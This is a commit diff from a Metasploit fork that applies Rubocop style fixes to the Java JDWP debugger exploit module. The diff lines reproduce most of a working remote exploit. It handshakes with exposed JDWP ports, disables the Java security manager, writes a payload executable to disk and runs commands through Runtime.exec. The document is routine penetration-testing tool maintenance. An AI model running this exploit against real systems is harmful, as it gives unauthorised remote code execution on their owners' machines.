adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Mass rubocop changes

Browse Source
This commit is contained in:
Spencer McIntyre
2025-12-17 17:11:13 -05:00
parent d4b196b309
commit 602adeb4c5
237 changed files with 4505 additions and 4446 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/multi/misc/java_jdwp_debugger.rb
+143 -145
View File
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
HANDSHAKE = "JDWP-Handshake"
HANDSHAKE = 'JDWP-Handshake'
REQUEST_PACKET_TYPE = 0x00
REPLY_PACKET_TYPE = 0x80
@@ -146,12 +146,12 @@ class MetasploitModule < Msf::Exploit::Remote
end
# Forges packet for JDWP protocol
def create_packet(cmdsig, data = "")
def create_packet(cmdsig, data = '')
flags = 0x00
cmdset, cmd = cmdsig
pktlen = data.length + 11
buf = [pktlen, @my_id, flags, cmdset, cmd]
pkt = buf.pack("NNCCC")
pkt = buf.pack('NNCCC')
pkt << data
@my_id += 2
pkt
@@ -165,12 +165,12 @@ class MetasploitModule < Msf::Exploit::Remote
if pkt_len < 4
fail_with(Failure::Unknown, "#{peer} - Received corrupted response")
end
id, flags, err_code = sock.get_once(7, timeout).unpack('NCn')
_, flags, err_code = sock.get_once(7, timeout).unpack('NCn')
if err_code != 0 && flags == REPLY_PACKET_TYPE
fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{err_code}")
end
response = ""
response = ''
while response.length + 11 < pkt_len
partial = sock.get_once(pkt_len, timeout)
fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial
@@ -184,7 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
def solve_string(data)
sock.put(create_packet(STRINGVALUE_SIG, data))
response = read_reply
return "" unless response
return '' unless response
return read_string(response)
end
@@ -200,7 +200,7 @@ class MetasploitModule < Msf::Exploit::Remote
buf = build_string(data)
sock.put(create_packet(CREATESTRING_SIG, buf))
buf = read_reply
return parse_entries(buf, [[@vars['objectid_size'], "obj_id"]], false)
return parse_entries(buf, [[@vars['objectid_size'], 'obj_id']], false)
end
# Packs normal string into string structure for target VM
@@ -213,24 +213,24 @@ class MetasploitModule < Msf::Exploit::Remote
# Pack Integer for JDWP protocol
def format(fmt, value)
if fmt == "L" || fmt == 8
if fmt == 'L' || fmt == 8
return [value].pack('Q>')
elsif fmt == "I" || fmt == 4
elsif fmt == 'I' || fmt == 4
return [value].pack('N')
end
fail_with(Failure::Unknown, "Unknown format")
fail_with(Failure::Unknown, 'Unknown format')
end
# Unpack Integer from JDWP protocol
def unformat(fmt, value)
if fmt == "L" || fmt == 8
if fmt == 'L' || fmt == 8
return value[0..7].unpack('Q>')[0]
elsif fmt == "I" || fmt == 4
elsif fmt == 'I' || fmt == 4
return value[0..3].unpack('N')[0]
end
fail_with(Failure::Unknown, "Unknown format")
fail_with(Failure::Unknown, 'Unknown format')
end
# Parses given data according to a set of formats
@@ -253,20 +253,20 @@ class MetasploitModule < Msf::Exploit::Remote
data = {}
formats.each do |fmt, name|
if fmt == "L" || fmt == 8
if fmt == 'L' || fmt == 8
data[name] = buf[index, 8].unpack('Q>')[0]
index += 8
elsif fmt == "I" || fmt == 4
elsif fmt == 'I' || fmt == 4
data[name] = buf[index, 4].unpack('N')[0]
index += 4
elsif fmt == "S"
elsif fmt == 'S'
data_len = buf[index, 4].unpack('N')[0]
data[name] = buf[index + 4, data_len]
index += 4 + data_len
elsif fmt == "C"
elsif fmt == 'C'
data[name] = buf[index].unpack('C')[0]
index += 1
elsif fmt == "Z"
elsif fmt == 'Z'
t = buf[index].unpack('C')[0]
if t == 115
data[name] = solve_string(buf[index + 1, 8])
@@ -275,7 +275,7 @@ class MetasploitModule < Msf::Exploit::Remote
data[name], buf = buf[index + 1, 4].unpack('NN')
end
else
fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response")
fail_with(Failure::UnexpectedReply, 'Unexpected data when parsing server response')
end
end
entries.append(data)
@@ -287,11 +287,11 @@ class MetasploitModule < Msf::Exploit::Remote
# Gets the sizes of variably-sized data types in the target VM
def get_sizes
formats = [
["I", "fieldid_size"],
["I", "methodid_size"],
["I", "objectid_size"],
["I", "referencetypeid_size"],
["I", "frameid_size"]
['I', 'fieldid_size'],
['I', 'methodid_size'],
['I', 'objectid_size'],
['I', 'referencetypeid_size'],
['I', 'frameid_size']
]
sock.put(create_packet(IDSIZES_SIG))
response = read_reply
@@ -302,11 +302,11 @@ class MetasploitModule < Msf::Exploit::Remote
# Gets the JDWP version implemented by the target VM
def get_version
formats = [
["S", "descr"],
["I", "jdwp_major"],
["I", "jdwp_minor"],
["S", "vm_version"],
["S", "vm_name"]
['S', 'descr'],
['I', 'jdwp_major'],
['I', 'jdwp_minor'],
['S', 'vm_version'],
['S', 'vm_name']
]
sock.put(create_packet(VERSION_SIG))
response = read_reply
@@ -315,7 +315,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
def version
"#{@vars["vm_name"]} - #{@vars["vm_version"]}"
"#{@vars['vm_name']} - #{@vars['vm_version']}"
end
# Returns reference for all threads currently running on target VM
@@ -325,7 +325,7 @@ class MetasploitModule < Msf::Exploit::Remote
num_threads = response.unpack('N').first
index = 4
size = @vars["objectid_size"]
size = @vars['objectid_size']
num_threads.times do
t_id = unformat(size, response[index, size])
@threads[t_id] = nil
@@ -338,10 +338,10 @@ class MetasploitModule < Msf::Exploit::Remote
return unless @classes.empty?
formats = [
["C", "reftype_tag"],
[@vars["referencetypeid_size"], "reftype_id"],
["S", "signature"],
["I", "status"]
['C', 'reftype_tag'],
[@vars['referencetypeid_size'], 'reftype_id'],
['S', 'signature'],
['I', 'status']
]
sock.put(create_packet(ALLCLASSES_SIG))
response = read_reply
@@ -352,7 +352,7 @@ class MetasploitModule < Msf::Exploit::Remote
def get_class_by_name(name)
@classes.each do |entry_array|
entry_array.each do |entry|
if entry["signature"].downcase == name.downcase
if entry['signature'].downcase == name.downcase
return entry
end
end
@@ -369,12 +369,12 @@ class MetasploitModule < Msf::Exploit::Remote
end
formats = [
[@vars["methodid_size"], "method_id"],
["S", "name"],
["S", "signature"],
["I", "mod_bits"]
[@vars['methodid_size'], 'method_id'],
['S', 'name'],
['S', 'signature'],
['I', 'mod_bits']
]
ref_id = format(@vars["referencetypeid_size"], reftype_id)
ref_id = format(@vars['referencetypeid_size'], reftype_id)
sock.put(create_packet(METHODS_SIG, ref_id))
response = read_reply
@methods[reftype_id] = parse_entries(response, formats)
@@ -383,12 +383,12 @@ class MetasploitModule < Msf::Exploit::Remote
# Returns information for each field in a reference type (ie. object)
def get_fields(reftype_id)
formats = [
[@vars["fieldid_size"], "field_id"],
["S", "name"],
["S", "signature"],
["I", "mod_bits"]
[@vars['fieldid_size'], 'field_id'],
['S', 'name'],
['S', 'signature'],
['I', 'mod_bits']
]
ref_id = format(@vars["referencetypeid_size"], reftype_id)
ref_id = format(@vars['referencetypeid_size'], reftype_id)
sock.put(create_packet(FIELDS_SIG, ref_id))
response = read_reply
fields = parse_entries(response, formats)
@@ -400,19 +400,19 @@ class MetasploitModule < Msf::Exploit::Remote
# or one of its superclasses, superinterfaces, or implemented interfaces. Access control is not enforced;
# for example, the values of private fields can be obtained.
def get_value(reftype_id, field_id)
data = format(@vars["referencetypeid_size"], reftype_id)
data = format(@vars['referencetypeid_size'], reftype_id)
data << [1].pack('N')
data << format(@vars["fieldid_size"], field_id)
data << format(@vars['fieldid_size'], field_id)
sock.put(create_packet(GETVALUES_SIG, data))
response = read_reply
num_values = response.unpack('N')[0]
unless (num_values == 1) && (response[4].unpack('C')[0] == TAG_OBJECT)
fail_with(Failure::Unknown, "Bad response when getting value for field")
fail_with(Failure::Unknown, 'Bad response when getting value for field')
end
len = @vars["objectid_size"]
len = @vars['objectid_size']
value = unformat(len, response[5..-1])
value
@@ -424,10 +424,10 @@ class MetasploitModule < Msf::Exploit::Remote
# the field's type exactly. For object values, there must exist a widening reference conversion from the
# value's type to the field's type and the field's type must be loaded.
def set_value(reftype_id, field_id, value)
data = format(@vars["referencetypeid_size"], reftype_id)
data = format(@vars['referencetypeid_size'], reftype_id)
data << [1].pack('N')
data << format(@vars["fieldid_size"], field_id)
data << format(@vars["objectid_size"], value)
data << format(@vars['fieldid_size'], field_id)
data << format(@vars['objectid_size'], value)
sock.put(create_packet(SETSTATICVALUES_SIG, data))
read_reply
@@ -437,11 +437,9 @@ class MetasploitModule < Msf::Exploit::Remote
def get_method_by_name(classname, name, signature = nil)
@methods[classname].each do |entry|
if signature.nil?
return entry if entry["name"].downcase == name.downcase
else
if entry["name"].downcase == name.downcase && entry["signature"].downcase == signature.downcase
return entry
end
return entry if entry['name'].downcase == name.downcase
elsif entry['name'].downcase == name.downcase && entry['signature'].downcase == signature.downcase
return entry
end
end
@@ -455,8 +453,8 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found")
end
get_methods(target_class["reftype_id"])
target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature)
get_methods(target_class['reftype_id'])
target_method = get_method_by_name(target_class['reftype_id'], looked_method, signature)
unless target_method
fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found")
end
@@ -466,7 +464,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept")
def str_to_fq_class(s)
i = s.rindex(".")
i = s.rindex('.')
unless i
fail_with(Failure::BadConfig, 'Bad defined break class')
end
@@ -482,12 +480,12 @@ class MetasploitModule < Msf::Exploit::Remote
# Gets the status of a given thread
def thread_status(thread_id)
sock.put(create_packet(THREADSTATUS_SIG, format(@vars["objectid_size"], thread_id)))
sock.put(create_packet(THREADSTATUS_SIG, format(@vars['objectid_size'], thread_id)))
buf = read_reply(datastore['BREAK_TIMEOUT'])
unless buf
fail_with(Failure::Unknown, "No network response")
fail_with(Failure::Unknown, 'No network response')
end
status, suspend_status = buf.unpack('NN')
status, = buf.unpack('NN')
status
end
@@ -497,12 +495,12 @@ class MetasploitModule < Msf::Exploit::Remote
if thread_id.nil?
sock.put(create_packet(RESUMEVM_SIG))
else
sock.put(create_packet(THREADRESUME_SIG, format(@vars["objectid_size"], thread_id)))
sock.put(create_packet(THREADRESUME_SIG, format(@vars['objectid_size'], thread_id)))
end
response = read_reply(datastore['BREAK_TIMEOUT'])
unless response
fail_with(Failure::Unknown, "No network response")
fail_with(Failure::Unknown, 'No network response')
end
response
@@ -513,12 +511,12 @@ class MetasploitModule < Msf::Exploit::Remote
if thread_id.nil?
sock.put(create_packet(SUSPENDVM_SIG))
else
sock.put(create_packet(THREADSUSPEND_SIG, format(@vars["objectid_size"], thread_id)))
sock.put(create_packet(THREADSUSPEND_SIG, format(@vars['objectid_size'], thread_id)))
end
response = read_reply
unless response
fail_with(Failure::Unknown, "No network response")
fail_with(Failure::Unknown, 'No network response')
end
response
@@ -545,7 +543,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Parses a received event and compares it with the expected
def parse_event(buf, event_id, thread_id)
len = @vars["objectid_size"]
len = @vars['objectid_size']
return false if buf.length < 10 + len - 1
r_id = buf[6..9].unpack('N')[0]
@@ -566,9 +564,9 @@ class MetasploitModule < Msf::Exploit::Remote
# superinterfaces, or implemented interfaces. Access control is not enforced; for example, private
# methods can be invoked.
def invoke_static(class_id, thread_id, meth_id, args = [])
data = format(@vars["referencetypeid_size"], class_id)
data << format(@vars["objectid_size"], thread_id)
data << format(@vars["methodid_size"], meth_id)
data = format(@vars['referencetypeid_size'], class_id)
data << format(@vars['objectid_size'], thread_id)
data << format(@vars['methodid_size'], meth_id)
data << [args.length].pack('N')
args.each do |arg|
@@ -585,10 +583,10 @@ class MetasploitModule < Msf::Exploit::Remote
# superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods
# can be invoked.
def invoke(obj_id, thread_id, class_id, meth_id, args = [])
data = format(@vars["objectid_size"], obj_id)
data << format(@vars["objectid_size"], thread_id)
data << format(@vars["referencetypeid_size"], class_id)
data << format(@vars["methodid_size"], meth_id)
data = format(@vars['objectid_size'], obj_id)
data << format(@vars['objectid_size'], thread_id)
data << format(@vars['referencetypeid_size'], class_id)
data << format(@vars['methodid_size'], meth_id)
data << [args.length].pack('N')
args.each do |arg|
@@ -604,9 +602,9 @@ class MetasploitModule < Msf::Exploit::Remote
# Creates a new object of specified class, invoking the specified constructor. The constructor
# method ID must be a member of the class type.
def create_instance(class_id, thread_id, meth_id, args = [])
data = format(@vars["referencetypeid_size"], class_id)
data << format(@vars["objectid_size"], thread_id)
data << format(@vars["methodid_size"], meth_id)
data = format(@vars['referencetypeid_size'], class_id)
data << format(@vars['objectid_size'], thread_id)
data << format(@vars['methodid_size'], meth_id)
data << [args.length].pack('N')
args.each do |arg|
@@ -621,13 +619,13 @@ class MetasploitModule < Msf::Exploit::Remote
# Creates a byte[]
def create_array(len)
target_class = get_class_by_name("[B")
fail_with(Failure::Unknown, "target_class is nil") if target_class.nil?
target_class = get_class_by_name('[B')
fail_with(Failure::Unknown, 'target_class is nil') if target_class.nil?
type_id = target_class["reftype_id"]
fail_with(Failure::Unknown, "type_id is nil") if type_id.nil?
type_id = target_class['reftype_id']
fail_with(Failure::Unknown, 'type_id is nil') if type_id.nil?
data = format(@vars["referencetypeid_size"], type_id)
data = format(@vars['referencetypeid_size'], type_id)
data << [len].pack('N')
sock.put(create_packet(ARRAYNEWINSTANCE_SIG, data))
@@ -637,7 +635,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Initializes the byte[] with values
def set_values(obj_id, args = [])
data = format(@vars["objectid_size"], obj_id)
data = format(@vars['objectid_size'], obj_id)
data << [0].pack('N')
data << [args.length].pack('N')
@@ -661,7 +659,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Configures payload according to targeted architecture
def setup_payload
# 1. Setting up generic values.
payload_exe = rand_text_alphanumeric(4 + rand(4))
payload_exe = rand_text_alphanumeric(rand(4..7))
pl_exe = generate_payload_exe
# 2. Setting up arch specific...
@@ -686,41 +684,41 @@ class MetasploitModule < Msf::Exploit::Remote
# Invokes java.lang.System.getProperty() for OS fingerprinting purposes
def fingerprint_os(thread_id)
size = @vars["objectid_size"]
size = @vars['objectid_size']
# 1. Creates a string on target VM with the property to be getted
cmd_obj_ids = create_string("os.name")
fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0
cmd_obj_id = cmd_obj_ids[0]["obj_id"]
cmd_obj_ids = create_string('os.name')
fail_with(Failure::Unknown, 'Failed to allocate string for payload dumping') if cmd_obj_ids.length == 0
cmd_obj_id = cmd_obj_ids[0]['obj_id']
# 2. Gets property
data = [TAG_OBJECT].pack('C')
data << format(size, cmd_obj_id)
data_array = [data]
runtime_class, runtime_meth = get_class_and_method("Ljava/lang/System;", "getProperty")
buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array)
fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected String") unless buf[0] == [TAG_STRING].pack('C')
runtime_class, runtime_meth = get_class_and_method('Ljava/lang/System;', 'getProperty')
buf = invoke_static(runtime_class['reftype_id'], thread_id, runtime_meth['method_id'], data_array)
fail_with(Failure::UnexpectedReply, 'Unexpected returned type: expected String') unless buf[0] == [TAG_STRING].pack('C')
str = unformat(size, buf[1..1 + size - 1])
@os = solve_string(format(@vars["objectid_size"], str))
@os = solve_string(format(@vars['objectid_size'], str))
end
# Creates a file on the server given a execution thread
def create_file(thread_id, filename)
cmd_obj_ids = create_string(filename)
fail_with(Failure::Unknown, "Failed to allocate string for filename") if cmd_obj_ids.length == 0
fail_with(Failure::Unknown, 'Failed to allocate string for filename') if cmd_obj_ids.length == 0
cmd_obj_id = cmd_obj_ids[0]["obj_id"]
size = @vars["objectid_size"]
cmd_obj_id = cmd_obj_ids[0]['obj_id']
size = @vars['objectid_size']
data = [TAG_OBJECT].pack('C')
data << format(size, cmd_obj_id)
data_array = [data]
runtime_class, runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "<init>", "(Ljava/lang/String;)V")
buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array)
fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C')
runtime_class, runtime_meth = get_class_and_method('Ljava/io/FileOutputStream;', '<init>', '(Ljava/lang/String;)V')
buf = create_instance(runtime_class['reftype_id'], thread_id, runtime_meth['method_id'], data_array)
fail_with(Failure::UnexpectedReply, 'Unexpected returned type: expected Object') unless buf[0] == [TAG_OBJECT].pack('C')
file = unformat(size, buf[1..1 + size - 1])
fail_with(Failure::Unknown, "Failed to create file. Try to change the TMP_PATH") if file.nil? || (file == 0)
fail_with(Failure::Unknown, 'Failed to create file. Try to change the TMP_PATH') if file.nil? || (file == 0)
register_files_for_cleanup(filename)
@@ -728,14 +726,14 @@ class MetasploitModule < Msf::Exploit::Remote
end
# Stores the payload on a new string created in target VM
def upload_payload(thread_id, pl_exe)
size = @vars["objectid_size"]
def upload_payload(_thread_id, pl_exe)
size = @vars['objectid_size']
buf = create_array(pl_exe.length)
fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Array") unless buf[0] == [TAG_ARRAY].pack('C')
fail_with(Failure::UnexpectedReply, 'Unexpected returned type: expected Array') unless buf[0] == [TAG_ARRAY].pack('C')
pl = unformat(size, buf[1..1 + size - 1])
fail_with(Failure::Unknown, "Failed to create byte array to store payload") if pl.nil? || (pl == 0)
fail_with(Failure::Unknown, 'Failed to create byte array to store payload') if pl.nil? || (pl == 0)
set_values(pl, pl_exe.bytes)
pl
@@ -743,62 +741,62 @@ class MetasploitModule < Msf::Exploit::Remote
# Dumps the payload on a opened server file given a execution thread
def dump_payload(thread_id, file, pl)
size = @vars["objectid_size"]
size = @vars['objectid_size']
data = [TAG_OBJECT].pack('C')
data << format(size, pl)
data_array = [data]
runtime_class, runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "write", "([B)V")
buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array)
runtime_class, runtime_meth = get_class_and_method('Ljava/io/FileOutputStream;', 'write', '([B)V')
buf = invoke(file, thread_id, runtime_class['reftype_id'], runtime_meth['method_id'], data_array)
unless buf[0] == [TAG_VOID].pack('C')
fail_with(Failure::Unknown, "Exception while writing to file")
fail_with(Failure::Unknown, 'Exception while writing to file')
end
end
# Closes a file on the server given a execution thread
def close_file(thread_id, file)
runtime_class, runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close")
buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"])
runtime_class, runtime_meth = get_class_and_method('Ljava/io/FileOutputStream;', 'close')
buf = invoke(file, thread_id, runtime_class['reftype_id'], runtime_meth['method_id'])
unless buf[0] == [TAG_VOID].pack('C')
fail_with(Failure::Unknown, "Exception while closing file")
fail_with(Failure::Unknown, 'Exception while closing file')
end
end
# Executes a system command on target VM making use of java.lang.Runtime.exec()
def execute_command(thread_id, cmd)
size = @vars["objectid_size"]
size = @vars['objectid_size']
# 1. Creates a string on target VM with the command to be executed
cmd_obj_ids = create_string(cmd)
if cmd_obj_ids.length == 0
fail_with(Failure::Unknown, "Failed to allocate string for payload dumping")
fail_with(Failure::Unknown, 'Failed to allocate string for payload dumping')
end
cmd_obj_id = cmd_obj_ids[0]["obj_id"]
cmd_obj_id = cmd_obj_ids[0]['obj_id']
# 2. Gets Runtime context
runtime_class, runtime_meth = get_class_and_method("Ljava/lang/Runtime;", "getRuntime")
buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
runtime_class, runtime_meth = get_class_and_method('Ljava/lang/Runtime;', 'getRuntime')
buf = invoke_static(runtime_class['reftype_id'], thread_id, runtime_meth['method_id'])
unless buf[0] == [TAG_OBJECT].pack('C')
fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
fail_with(Failure::UnexpectedReply, 'Unexpected returned type: expected Object')
end
rt = unformat(size, buf[1..1 + size - 1])
if rt.nil? || (rt == 0)
fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()")
fail_with(Failure::Unknown, 'Failed to invoke Runtime.getRuntime()')
end
# 3. Finds and executes "exec" method supplying the string with the command
exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec")
exec_meth = get_method_by_name(runtime_class['reftype_id'], 'exec')
if exec_meth.nil?
fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()")
fail_with(Failure::BadConfig, 'Cannot find method Runtime.exec()')
end
data = [TAG_OBJECT].pack('C')
data << format(size, cmd_obj_id)
data_array = [data]
buf = invoke(rt, thread_id, runtime_class["reftype_id"], exec_meth["method_id"], data_array)
buf = invoke(rt, thread_id, runtime_class['reftype_id'], exec_meth['method_id'], data_array)
unless buf[0] == [TAG_OBJECT].pack('C')
fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
fail_with(Failure::UnexpectedReply, 'Unexpected returned type: expected Object')
end
end
@@ -812,20 +810,20 @@ class MetasploitModule < Msf::Exploit::Remote
break
end
end
fail_with(Failure::Unknown, "Could not find a suitable thread for stepping") if t_id.nil?
fail_with(Failure::Unknown, 'Could not find a suitable thread for stepping') if t_id.nil?
# 2. Suspend the VM before setting the event
suspend_vm
vprint_status("Setting 'step into' event in thread: #{t_id}")
step_info = format(@vars["objectid_size"], t_id)
step_info = format(@vars['objectid_size'], t_id)
step_info << [STEP_MIN].pack('N')
step_info << [STEP_INTO].pack('N')
data = [[MODKIND_STEP, step_info]]
r_id = send_event(EVENT_STEP, data)
unless r_id
fail_with(Failure::Unknown, "Could not set the event")
fail_with(Failure::Unknown, 'Could not set the event')
end
return r_id, t_id
@@ -833,28 +831,28 @@ class MetasploitModule < Msf::Exploit::Remote
# Disables security manager if it's set on target JVM
def disable_sec_manager
sys_class = get_class_by_name("Ljava/lang/System;")
sys_class = get_class_by_name('Ljava/lang/System;')
fields = get_fields(sys_class["reftype_id"])
fields = get_fields(sys_class['reftype_id'])
sec_field = nil
fields.each do |field|
sec_field = field["field_id"] if field["name"].downcase == "security"
sec_field = field['field_id'] if field['name'].downcase == 'security'
end
fail_with(Failure::Unknown, "Security attribute not found") if sec_field.nil?
fail_with(Failure::Unknown, 'Security attribute not found') if sec_field.nil?
value = get_value(sys_class["reftype_id"], sec_field)
value = get_value(sys_class['reftype_id'], sec_field)
if (value == 0)
print_good("Security manager was not set")
print_good('Security manager was not set')
else
set_value(sys_class["reftype_id"], sec_field, 0)
if get_value(sys_class["reftype_id"], sec_field) == 0
print_good("Security manager has been disabled")
set_value(sys_class['reftype_id'], sec_field, 0)
if get_value(sys_class['reftype_id'], sec_field) == 0
print_good('Security manager has been disabled')
else
print_good("Security manager has not been disabled, trying anyway...")
print_good('Security manager has not been disabled, trying anyway...')
end
end
end
@@ -903,25 +901,25 @@ class MetasploitModule < Msf::Exploit::Remote
connect
unless handshake == HANDSHAKE
fail_with(Failure::NotVulnerable, "JDWP Protocol not found")
fail_with(Failure::NotVulnerable, 'JDWP Protocol not found')
end
print_status("Retrieving the sizes of variable sized data types in the target VM...")
print_status('Retrieving the sizes of variable sized data types in the target VM...')
get_sizes
print_status("Getting the version of the target VM...")
print_status('Getting the version of the target VM...')
get_version
print_status("Getting all currently loaded classes by the target VM...")
print_status('Getting all currently loaded classes by the target VM...')
get_all_classes
print_status("Getting all running threads in the target VM...")
print_status('Getting all running threads in the target VM...')
get_all_threads
print_status("Setting 'step into' event...")
r_id, t_id = set_step_event
print_status("Resuming VM and waiting for an event...")
print_status('Resuming VM and waiting for an event...')
response = resume_vm
unless parse_event(response, r_id, t_id)
@@ -937,13 +935,13 @@ class MetasploitModule < Msf::Exploit::Remote
end
vprint_status("Received matching event from thread #{t_id}")
print_status("Deleting step event...")
print_status('Deleting step event...')
clear_event(EVENT_STEP, r_id)
print_status("Disabling security manager if set...")
print_status('Disabling security manager if set...')
disable_sec_manager
print_status("Dropping and executing payload...")
print_status('Dropping and executing payload...')
exec_payload(t_id)
disconnect